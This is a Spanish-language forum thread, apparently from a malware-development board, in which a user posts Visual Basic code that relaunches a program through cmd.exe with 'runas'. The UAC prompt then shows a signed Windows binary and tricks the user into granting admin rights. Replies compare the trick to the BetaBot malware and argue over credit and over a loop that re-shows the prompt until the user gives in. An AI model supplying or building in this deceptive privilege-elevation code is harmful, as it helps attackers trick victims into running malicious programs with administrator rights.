• Fuentes

 #477537  por Ninfrock
 07 Sep 2015, 12:40
Hola!

Dejo esta funcion para elevar la UAC utilizando ingeniería social

Si no se le dan los permisos, continua su ejecución normal.

Saqué la idea del UACtrick de Scorpio

Declaraciones:
[spoiler][code2=vbnet]Private Declare Function ShellExecute Lib "Shell32" Alias "ShellExecuteA" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Declare Function IsUserAnAdmin Lib "Shell32" Alias "#680" () As Integer[/code2][/spoiler]


Codigo:
[spoiler][code2=vbnet]If IsUserAnAdmin = 0 Then
If ShellExecute(0, "runas", "cmd.exe", " /c """ & App.path & "\" & App.EXEName & ".exe" & """", App.path & "\", vbNormalFocus) <> 5 Then
End
End If
End If
'.........
'Ejecucion de codigo normal....
'.........[/code2][/spoiler]


Probado en Win 7 x86 y Win 8.1 x64

Saludos!
 #478430  por Pink
 27 Sep 2015, 13:19
Seria mas bien como forzar la UAC porque de ingeniería social no se le ve nada :S

Gracias por el codigo.
Saludos
 #478432  por Ninfrock
 27 Sep 2015, 13:26
Pink escribió:Seria mas bien como forzar la UAC porque de ingeniería social no se le ve nada :S

Gracias por el codigo.
Saludos
Cuando le dan doble clic al programa...

En lugar de aparecer asi:

Imagen

Aparece asi:
Imagen

Capisce ?
 #478433  por comand
 27 Sep 2015, 13:31
Me parece una buena idea, sirve para confundir un poco y con buena conversación creo que pasa desapercibido a menos intendidos
 #478441  por Scorpio
 27 Sep 2015, 15:41
Claro que usa Ingenieria Social, trata de engañar al usuario al mostrar una aplicación de windows, es el mismo metodo que usaba la BetaBot, ahora creo que ya tiene Bypass UAC.

//Regards.
 #478450  por Pink
 27 Sep 2015, 20:12
aaaaaaa ya veo :)

Saludos
 #478451  por Pink
 27 Sep 2015, 20:16
aaaaaaa ya veo :)

Saludos
 #478510  por Enzyme
 28 Sep 2015, 11:21
1. Poor mod of MetalKindom method. (Next time give credits. )

2. What kind of trick it is? Where is the fucking loop ? LoL

3.Why da fuck you are passing "vbNormalFocus" as "nShowCmd" ? It also shows cmd window.

4.Nothings resembles with betabot SE.

 #478523  por Scorpio
 28 Sep 2015, 19:09
Enzyme escribió:1. Poor mod of MetalKindom method. (Next time give credits. )

2. What kind of trick it is? Where is the fucking loop ? LoL

3.Why da fuck you are passing "vbNormalFocus" as "nShowCmd" ? It also shows cmd window.

4.Nothings resembles with betabot SE.
¿Metal Kingdom? This is my method.

This method try to open the uac dialog with a signed windows application.

Before, BetaBot he used this method. https://blog.gdatasoftware.com/blog/art ... a-bot.html

//Regards.
 #478732  por Enzyme
 01 Oct 2015, 20:03
¿Metal Kingdom? This is my method.

This method try to open the uac dialog with a signed windows application.

Before, BetaBot he used this method. https://blog.gdatasoftware.com/blog/art ... a-bot.html

//Regards.
LoL By "Metal Kingdom Method " I meant his UAC popup freeze aka -----------------> Loop Until Error <> 5

The crucial part in betabot UAC SE was that beautiful msgbox Where is that ? +few more things are missing too....
 #478931  por Ninfrock
 06 Oct 2015, 00:52
Enzyme escribió:
¿Metal Kingdom? This is my method.

This method try to open the uac dialog with a signed windows application.

Before, BetaBot he used this method. https://blog.gdatasoftware.com/blog/art ... a-bot.html

//Regards.
LoL By "Metal Kingdom Method " I meant his UAC popup freeze aka -----------------> Loop Until Error <> 5

The crucial part in betabot UAC SE was that beautiful msgbox Where is that ? +few more things are missing too....
Eso de' error <> 5', lo descubrí yo, es tan simple como mostrar la UAC, cancelarla y revisar el codigo de error que retorna, no habia visto el de Metal.